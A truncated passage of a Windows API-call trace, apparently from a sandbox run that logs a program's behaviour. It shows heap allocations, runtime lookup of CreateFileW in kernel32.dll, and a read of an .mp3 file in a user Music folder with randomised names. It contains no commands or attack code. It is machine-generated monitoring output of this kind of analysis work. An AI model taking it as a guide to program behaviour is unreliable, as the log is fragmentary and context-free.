[0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0116.778] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.778] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a49d0 [0116.779] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.779] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0116.780] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.780] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.780] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.781] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.781] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.782] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.782] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0116.782] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab38 [0116.782] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cab38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.783] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.783] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0116.783] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\mzzhzq983sylb.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0116.783] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a8430 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.784] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.784] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.785] FreeLibrary (hLibModule=0x772d0000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0116.785] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a49d0 | out: hHeap=0x1780000) returned 1 [0116.786] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.787] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9350 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0116.787] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0116.787] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 